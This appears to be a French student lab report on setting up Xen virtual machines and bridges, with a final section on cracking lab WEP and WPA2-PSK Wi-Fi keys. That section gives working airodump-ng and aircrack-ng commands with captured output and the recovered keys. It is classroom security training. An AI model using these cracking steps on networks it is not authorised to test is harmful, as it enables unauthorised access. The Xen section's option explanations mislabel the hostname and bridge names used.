Atelier SysRes SE4 2025/2026 E1
CRÉATION MACHINES VIRTUELLES
Il faut d'abord crée un "bridge" sur capbreton pour relier nos 3 machines virtuelles ensemble. Un "bridge" n'a rien de complexe, c'est un commutateur mais virtuel. C'est comme un commutateur physique avec des ports ethernet pour relier des machines ensemble mais il n'existe pas dans le monde physique seulement sur nos ordinateurs et VM. Pour cela, nous créons notre pont sur capbreton le commutateur/routeur dans la E304. Nous le faisons dans ce chemin : /etc/network/interfaces.d/SE42026_pcasimir_ahoudus
Veuillez faire en sorte de ne PAS modifier le fichier le fichier /etc/network/interfaces car c'est le fichier qui permet de configurer la connectivité de capbreton lui-même.
auto pont_Gercourt
iface pont_Gercourt inet manual
bridge_ports none
up ip link set $IFACE up
down ip link set $IFACE down
Ensuite, nous devons initialiser nos MV de services grâce à l'outil hyperviseur Xen.
Un hyperviseur, c’est le logiciel qui permet de faire tourner plusieurs “ordinateurs virtuels” (VM) sur un seul ordinateur physique.
Au lieu d’avoir 1 machine = 1 OS, tu as 1 machine physique = plusieurs OS (Linux, OpenWRT, Windows…) qui tournent en parallèle, chacun dans sa VM.
Un hyperviseur est “entre” le matériel et les VM, et il s’occupe de partager proprement :
- CPU : qui a le droit d’exécuter quand (ordonnancement)
- RAM : qui a droit à quelle mémoire (isolation, allocation)
- Disques : chaque VM a “son disque” (souvent un fichier
.img, LVM, etc.) - Réseau : chaque VM a une carte réseau virtuelle, connectée à un switch/bridge virtuel
- Isolation/Sécurité : une VM ne doit pas pouvoir casser les autres.
Xen, c’est un hyperviseur “bare-metal” très utilisé historiquement en serveur/cloud.
Dans Xen, toutes les VM sont des domains.
- Dom0 (Domain 0) : la VM “chef” (privilégiée)
- c’est elle qui a les drivers matériels
- c’est elle qui crée / détruit / configure les autres VM
- elle gère souvent le réseau (bridges/VLAN) et le stockage
- DomU : les VM “normales” (invitées)
- elles ont des périphériques virtuels
- elles passent souvent par Dom0 pour accéder au hardware
Petit schéma mental :
Matériel (CPU/RAM/NIC/Disques)
│
Xen
│
┌───────────┴───────────┐
│ │
Dom0 Dom1, Dom2, Dom3...
(admin + drivers) (VM Linux / OpenWRT / etc.)
Il leur faut plusieurs paramètres pour fonctionner selon nos critères.
root@capbreton:~# xen-create-image --hostname=SE4.Merteuil --dhcp --bridge=pont_Gercourt --dir=/usr/local/xen --size=10GB --dist=daedalus --memory=2048M --force
xen-create-image: Commande permettant de créer une nouvelle machine virtuelle Xen--hostname=SE4.Merteuil: Spécifie le nom d'hôte de la nouvelle MV créée. Ici, le nom d'hôte seraSE4.Atreus.--dhcp: Indique que la MV obtiendra automatiquement une adresse IP via DHCP. Aucune configuration statique d'adresse IP ne sera nécessaire. Vous devriez quand même configuré votre/etc/network/interfacedans votre VM pour qu'elle ait une adresse IPv4 sur votre commutateur virtuel/bridge.--bridge=bifrost: Précise l'utilisation du pont réseau nommébifrostpour connecter la machine virtuelle au réseau physique ou virtuel existant. Ceci permet une connexion directe de la VM au réseau.--dir=/usr/local/xen: Définit le répertoire dans lequel seront stockées les images disque et les fichiers associés de la MV. Ici, l'image sera placée dans le dossier/usr/local/xen.--size=10GB: Détermine la taille du disque virtuel pour cette MV. Dans cet exemple, le disque fera10 Go.--dist=daedalus: Indique la distribution du système d'exploitation à utiliser pour la MV. Ici, la distribution choisie s'appelledaedaluspour Debian.
--memory=2048M: Détermine la quantité de mémoire vive (RAM) allouée à la MV. Dans cet exemple, la MV aura2048 Mo(soit 2 Go) de RAM.
Volumes Logiques
Dans notre infra, on ne met pas tout le système d’une VM sur un seul “disque” géant. On sépare certains répertoires dans des volumes logiques (LVM) dédiés, notamment :
/home: dossiers utilisateurs (fichiers perso, configs, projets, clés SSH…)/var: données qui bougent beaucoup (logs, cache, bases de données, spool, etc.)
Cassage de clé WIFI
WEP
Sur un 1 terminal :
sudo airodump-ng wlan1 --write crackage_pcasimir/pcasimir --bssid 04:DA:D2:9C:50:50 -c4
Il faut laisser tourner le programme pendant un moment pour capturer un maximum d'IVs (environ 50*10³)
Ce que l'on voit :
CH 4 ][ Elapsed: 40 mins ][ 2026-02-10 16:07 ][ paused output
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
04:DA:D2:9C:50:50 -64 0 10771 48468 31 4 54e. WEP WEP cracotte01
BSSID STATION PWR Rate Lost Frames Notes Probes
04:DA:D2:9C:50:50 40:A5:EF:01:21:80 -73 0 -36e 621 58224
sur 2ème terminal :
Une fois qu'on a 50*10³ IV on fait :
sudo aircrack-ng -a1 -b 04:DA:D2:9C:50:50 crackage_pcasimir/pcasimir-01.cap -s
Résultat :
KB depth byte(vote)
0 1/ 2 B5(55552) 84(53504) 2B(52992) 2F(52480) A0(52480) BA(52224)
1 0/ 5 49(66304) E8(55552) 20(55296) 65(55296) 73(55296) 5F(53760)
2 41/ 2 E1(48640) 0E(48384) 3D(48384) 63(48384) 6C(48384) 9C(48384)
3 4/ 3 B3(53248) 7B(52992) 95(52992) 31(52736) 12(52224) FF(52224)
4 1/ 2 21(55552) 17(52480) 26(52224) B5(52224) 16(51968) C0(51712)
KEY FOUND! [ FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE ]
Decrypted correctly: 100%
WPA2-PSK
pcasimir@zabeth13:~$ sudo airodump-ng wlan1 --write crackage_pcasimir/airodumpWPA --bssid 44:AD:D9:5F:87:00 -c13
CH 13 ][ Elapsed: 1 hour 44 mins ][ 2026-02-10 18:41 ][ fixed channel wlan1: 4
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
44:AD:D9:5F:87:00 -58 0 28293 508 0 13 54e. WPA2 CCMP PSK kracotte01
BSSID STATION PWR Rate Lost Frames Notes Probes
pcasimir@zabeth13:~$ sudo aircrack-ng -a2 -b 44:AD:D9:5F:87:00 -w crackage_pcasimir/dico.txt crackage_pcasimir/airodumpWPA-01.cap
Aircrack-ng 1.7
[00:55:43] 66515032/100000000 keys tested (19870.44 k/s)
Time left: 28 minutes, 5 seconds 66.52%
KEY FOUND! [ 66689666 ]
Master Key : 3C A8 6A 6B 80 C3 36 12 EC D6 36 89 9F E3 F6 BC
D6 B2 24 8A 49 B4 9C 2A A3 6F 3E A0 96 15 8B F5
Transient Key : A0 53 57 7D 4B 67 FB 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
EAPOL HMAC : 52 DE 19 6D B0 E3 3B 2C 1A DA D3 F2 66 39 F2 DD